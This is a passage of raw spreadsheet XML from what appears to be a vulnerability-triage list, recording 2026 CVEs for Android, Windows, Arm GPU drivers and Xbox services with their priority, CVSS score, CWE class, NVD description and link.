s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F441" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G441" s="5" t="inlineStr" /><c r="H441" s="5" t="n"><v>0.001</v></c><c r="I441" s="5" t="inlineStr" /><c r="J441" s="5" t="inlineStr" /><c r="K441" s="5" t="inlineStr" /><c r="L441" s="5" t="inlineStr" /><c r="M441" s="5" t="inlineStr" /><c r="N441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P441" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q441" s="5" t="inlineStr" /><c r="R441" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S441" s="5" t="inlineStr"><is><t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T441" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t></is></c></row><row r="442"><c r="A442" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C442" s="5" t="inlineStr"><is><t>CVE-2026-45531</t></is></c><c r="D442" s="5" t="n"><v>7.8</v></c><c r="E442" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F442" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G442" s="5" t="inlineStr" /><c r="H442" s="5" t="n"><v>0.001</v></c><c r="I442" s="5" t="inlineStr" /><c r="J442" s="5" t="inlineStr" /><c r="K442" s="5" t="inlineStr" /><c r="L442" s="5" t="inlineStr" /><c r="M442" s="5" t="inlineStr" /><c r="N442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P442" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q442" s="5" t="inlineStr" /><c r="R442" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S442" s="5" t="inlineStr"><is><t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T442" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t></is></c></row><row r="443"><c r="A443" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C443" s="5" t="inlineStr"><is><t>CVE-2026-49881</t></is></c><c r="D443" s="5" t="n"><v>7.8</v></c><c r="E443" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F443" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G443" s="5" t="inlineStr" /><c r="H443" s="5" t="n"><v>0.001</v></c><c r="I443" s="5" t="inlineStr" /><c r="J443" s="5" t="inlineStr" /><c r="K443" s="5" t="inlineStr" /><c r="L443" s="5" t="inlineStr" /><c r="M443" s="5" t="inlineStr" /><c r="N443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P443" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q443" s="5" t="inlineStr" /><c r="R443" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S443" s="5" t="inlineStr"><is><t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T443" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t></is></c></row><row r="444"><c r="A444" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C444" s="5" t="inlineStr"><is><t>CVE-2026-49884</t></is></c><c r="D444" s="5" t="n"><v>7.8</v></c><c r="E444" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F444" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G444" s="5" t="inlineStr" /><c r="H444" s="5" t="n"><v>0.001</v></c><c r="I444" s="5" t="inlineStr" /><c r="J444" s="5" t="inlineStr" /><c r="K444" s="5" t="inlineStr" /><c r="L444" s="5" t="inlineStr" /><c r="M444" s="5" t="inlineStr" /><c r="N444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P444" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q444" s="5" t="inlineStr" /><c r="R444" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S444" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T444" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t></is></c></row><row r="445"><c r="A445" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C445" s="5" t="inlineStr"><is><t>CVE-2026-49887</t></is></c><c r="D445" s="5" t="n"><v>7.8</v></c><c r="E445" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F445" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G445" s="5" t="inlineStr" /><c r="H445" s="5" t="n"><v>0.001</v></c><c r="I445" s="5" t="inlineStr" /><c r="J445" s="5" t="inlineStr" /><c r="K445" s="5" t="inlineStr" /><c r="L445" s="5" t="inlineStr" /><c r="M445" s="5" t="inlineStr" /><c r="N445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P445" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q445" s="5" t="inlineStr" /><c r="R445" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S445" s="5" t="inlineStr"><is><t>In maybeRemoveInvalidInstallerPackageName of InstallRepository.kt, there is a possible unauthorized app update due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T445" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t></is></c></row><row r="446"><c r="A446" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C446" s="5" t="inlineStr"><is><t>CVE-2026-49918</t></is></c><c r="D446" s="5" t="n"><v>7.8</v></c><c r="E446" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F446" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G446" s="5" t="inlineStr" /><c r="H446" s="5" t="n"><v>0.001</v></c><c r="I446" s="5" t="inlineStr" /><c r="J446" s="5" t="inlineStr" /><c r="K446" s="5" t="inlineStr" /><c r="L446" s="5" t="inlineStr" /><c r="M446" s="5" t="inlineStr" /><c r="N446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P446" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q446" s="5" t="inlineStr" /><c r="R446" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S446" s="5" t="inlineStr"><is><t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T446" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t></is></c></row><row r="447"><c r="A447" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C447" s="5" t="inlineStr"><is><t>CVE-2026-49919</t></is></c><c r="D447" s="5" t="n"><v>7.8</v></c><c r="E447" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F447" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G447" s="5" t="inlineStr" /><c r="H447" s="5" t="n"><v>0.001</v></c><c r="I447" s="5" t="inlineStr" /><c r="J447" s="5" t="inlineStr" /><c r="K447" s="5" t="inlineStr" /><c r="L447" s="5" t="inlineStr" /><c r="M447" s="5" t="inlineStr" /><c r="N447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P447" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q447" s="5" t="inlineStr" /><c r="R447" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S447" s="5" t="inlineStr"><is><t>In tt_face_colr_blend_layer of ttcolr.c, there is a possible remote code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T447" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t></is></c></row><row r="448"><c r="A448" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C448" s="5" t="inlineStr"><is><t>CVE-2026-49927</t></is></c><c r="D448" s="5" t="n"><v>7.8</v></c><c r="E448" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F448" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G448" s="5" t="inlineStr" /><c r="H448" s="5" t="n"><v>0.001</v></c><c r="I448" s="5" t="inlineStr" /><c r="J448" s="5" t="inlineStr" /><c r="K448" s="5" t="inlineStr" /><c r="L448" s="5" t="inlineStr" /><c r="M448" s="5" t="inlineStr" /><c r="N448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q448" s="5" t="inlineStr" /><c r="R448" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S448" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t></is></c></row><row r="449"><c r="A449" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C449" s="5" t="inlineStr"><is><t>CVE-2026-49932</t></is></c><c r="D449" s="5" t="n"><v>7.8</v></c><c r="E449" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F449" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G449" s="5" t="inlineStr" /><c r="H449" s="5" t="n"><v>0.001</v></c><c r="I449" s="5" t="inlineStr" /><c r="J449" s="5" t="inlineStr" /><c r="K449" s="5" t="inlineStr" /><c r="L449" s="5" t="inlineStr" /><c r="M449" s="5" t="inlineStr" /><c r="N449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q449" s="5" t="inlineStr" /><c r="R449" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S449" s="5" t="inlineStr"><is><t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t></is></c></row><row r="450"><c r="A450" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C450" s="5" t="inlineStr"><is><t>CVE-2026-55273</t></is></c><c r="D450" s="5" t="n"><v>7.8</v></c><c r="E450" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F450" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G450" s="5" t="inlineStr" /><c r="H450" s="5" t="n"><v>0.001</v></c><c r="I450" s="5" t="inlineStr" /><c r="J450" s="5" t="inlineStr" /><c r="K450" s="5" t="inlineStr" /><c r="L450" s="5" t="inlineStr" /><c r="M450" s="5" t="inlineStr" /><c r="N450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q450" s="5" t="inlineStr" /><c r="R450" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S450" s="5" t="inlineStr"><is><t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t></is></c></row><row r="451"><c r="A451" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C451" s="5" t="inlineStr"><is><t>CVE-2026-55285</t></is></c><c r="D451" s="5" t="n"><v>7.8</v></c><c r="E451" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F451" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G451" s="5" t="inlineStr" /><c r="H451" s="5" t="n"><v>0.001</v></c><c r="I451" s="5" t="inlineStr" /><c r="J451" s="5" t="inlineStr" /><c r="K451" s="5" t="inlineStr" /><c r="L451" s="5" t="inlineStr" /><c r="M451" s="5" t="inlineStr" /><c r="N451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q451" s="5" t="inlineStr" /><c r="R451" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S451" s="5" t="inlineStr"><is><t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t></is></c></row><row r="452"><c r="A452" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C452" s="5" t="inlineStr"><is><t>CVE-2026-55294</t></is></c><c r="D452" s="5" t="n"><v>7.8</v></c><c r="E452" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F452" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G452" s="5" t="inlineStr" /><c r="H452" s="5" t="n"><v>0.001</v></c><c r="I452" s="5" t="inlineStr" /><c r="J452" s="5" t="inlineStr" /><c r="K452" s="5" t="inlineStr" /><c r="L452" s="5" t="inlineStr" /><c r="M452" s="5" t="inlineStr" /><c r="N452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q452" s="5" t="inlineStr" /><c r="R452" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S452" s="5" t="inlineStr"><is><t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t></is></c></row><row r="453"><c r="A453" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C453" s="5" t="inlineStr"><is><t>CVE-2026-56172</t></is></c><c r="D453" s="5" t="n"><v>7.8</v></c><c r="E453" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F453" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G453" s="5" t="inlineStr" /><c r="H453" s="5" t="n"><v>0.003</v></c><c r="I453" s="5" t="inlineStr" /><c r="J453" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K453"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453" s="5" t="inlineStr" /><c r="M453" s="5" t="inlineStr" /><c r="N453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P453" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q453" s="5" t="inlineStr" /><c r="R453" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S453" s="5" t="inlineStr"><is><t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t></is></c></row><row r="454"><c r="A454" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C454" s="5" t="inlineStr"><is><t>CVE-2026-56177</t></is></c><c r="D454" s="5" t="n"><v>7.8</v></c><c r="E454" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F454" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G454" s="5" t="inlineStr" /><c r="H454" s="5" t="n"><v>0.003</v></c><c r="I454" s="5" t="inlineStr" /><c r="J454" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K45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54" s="5" t="inlineStr" /><c r="M454" s="5" t="inlineStr" /><c r="N454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P454" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q454" s="5" t="inlineStr" /><c r="R454" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S454" s="5" t="inlineStr"><is><t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t></is></c></row><row r="455"><c r="A455" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C455" s="5" t="inlineStr"><is><t>CVE-2026-56198</t></is></c><c r="D455" s="5" t="n"><v>7.8</v></c><c r="E455" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F455" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G455" s="5" t="inlineStr" /><c r="H455" s="5" t="n"><v>0.002</v></c><c r="I455" s="5" t="inlineStr" /><c r="J455" s="5" t="inlineStr" /><c r="K455" s="5" t="inlineStr" /><c r="L455" s="5" t="inlineStr" /><c r="M455" s="5" t="inlineStr" /><c r="N455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P455" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q455" s="5" t="inlineStr" /><c r="R455" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S455" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t></is></c></row><row r="456"><c r="A456" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C456" s="5" t="inlineStr"><is><t>CVE-2026-5729</t></is></c><c r="D456" s="5" t="n"><v>7.8</v></c><c r="E456" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F456" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G456" s="5" t="inlineStr" /><c r="H456" s="5" t="n"><v>0.001</v></c><c r="I456" s="5" t="inlineStr" /><c r="J456" s="5" t="inlineStr" /><c r="K456" s="5" t="inlineStr" /><c r="L456" s="5" t="inlineStr" /><c r="M456" s="5" t="inlineStr" /><c r="N456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P456" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q456" s="5" t="inlineStr" /><c r="R456" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S456" s="5" t="inlineStr"><is><t>Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform valid GPU processing operations to access already freed memory.



This issue affects Valhall GPU Kernel Driver: from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r50p0 through r54p3, r55p0.</t></is></c><c r="T456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t></is></c></row><row r="457"><c r="A457" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C457" s="5" t="inlineStr"><is><t>CVE-2026-58599</t></is></c><c r="D457" s="5" t="n"><v>7.8</v></c><c r="E457" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F457" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G457" s="5" t="inlineStr" /><c r="H457" s="5" t="n"><v>0.003</v></c><c r="I457" s="5" t="inlineStr" /><c r="J457" s="5" t="inlineStr" /><c r="K457" s="5" t="inlineStr" /><c r="L457" s="5" t="inlineStr" /><c r="M457" s="5" t="inlineStr" /><c r="N457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P457" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q457" s="5" t="inlineStr" /><c r="R457" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S457" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="T457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t></is></c></row><row r="458"><c r="A458" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C458" s="5" t="inlineStr"><is><t>CVE-2026-58600</t></is></c><c r="D458" s="5" t="n"><v>7.8</v></c><c r="E458" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F458" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G458" s="5" t="inlineStr" /><c r="H458" s="5" t="n"><v>0.003</v></c><c r="I458" s="5" t="inlineStr" /><c r="J458" s="5" t="inlineStr" /><c r="K458" s="5" t="inlineStr" /><c r="L458" s="5" t="inlineStr" /><c r="M458" s="5" t="inlineStr" /><c r="N458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P458" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q458" s="5" t="inlineStr" /><c r="R458" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S458" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t></is></c></row><row r="459"><c r="A459" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C459" s="5" t="inlineStr"><is><t>CVE-2026-58611</t></is></c><c r="D459" s="5" t="n"><v>7.8</v></c><c r="E459" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F459" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G459" s="5" t="inlineStr" /><c r="H459" s="5" t="n"><v>0.002</v></c><c r="I459" s="5" t="inlineStr" /><c r="J459" s="5" t="inlineStr" /><c r="K459" s="5" t="inlineStr"><is><t>microsoft:xbox_gaming_services</t></is></c><c r="L459" s="5" t="inlineStr" /><c r="M459" s="5" t="inlineStr" /><c r="N459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P459" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q459" s="5" t="inlineStr" /><c r="R459" s="5" t="inlineStr"><is><t>CWE-285</t></is></c><c r="S459" s="5" t="inlineStr"><is><t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t></is></c></row><row r="460"><c r="A460" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C460" s="5" t="inlineStr"><is><t>CVE-2026-58820</t></is></c><c r="D460" s="5" t="n"><v>7.8</v></c><c r="E460" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F460" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G460" s="5" t="inlineStr" /><c r="H460" s="5" t="n"><v>0.001</v></c><c r="I460" s="5" t="inlineStr" /><c r="J460" s="5" t="inlineStr" /><c r="K460" s="5" t="inlineStr" /><c r="L460" s="5" t="inlineStr" /><c r="M460" s="5" t="inlineStr" /><c r="N460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P460" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q460" s="5" t="inlineStr" /><c r="R460" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S460" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t></is></c><c r="T460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t></is></c></row><row r="461"><c r="A461" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C461" s="5" t="inlineStr"><is><t>CVE-2026-58823</t></is></c><c r="D461" s="5" t="n"><v>7.8</v></c><c r="E461" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F461" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G461" s="5" t="inlineStr" /><c r="H461" s="5" t="n"><v>0.001</v></c><c r="I461" s="5" t="inlineStr" /><c r="J461" s="5" t="inlineStr" /><c r="K461" s="5" t="inlineStr" /><c r="L461" s="5" t="inlineStr" /><c r="M461" s="5" t="inlineStr" /><c r="N461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q461" s="5" t="inlineStr" /><c r="R461" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S461" s="5" t="inlineStr"><is><t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t></is></c></row><row r="462"><c r="A462" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C462" s="5" t="inlineStr"><is><t>CVE-2026-58839</t></is></c><c r="D462" s="5" t="n"><v>7.8</v></c><c r="E462" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F462" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G462" s="5" t="inlineStr" /><c r="H462" s="5" t="n"><v>0.001</v></c><c r="I462" s="5" t="inlineStr" /><c r="J462" s="5" t="inlineStr" /><c r="K462" s="5" t="inlineStr" /><c r="L462" s="5" t="inlineStr" /><c r="M462" s="5" t="inlineStr" /><c r="N462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q462" s="5" t="inlineStr" /><c r="R462" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S462" s="5" t="inlineStr"><is><t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed 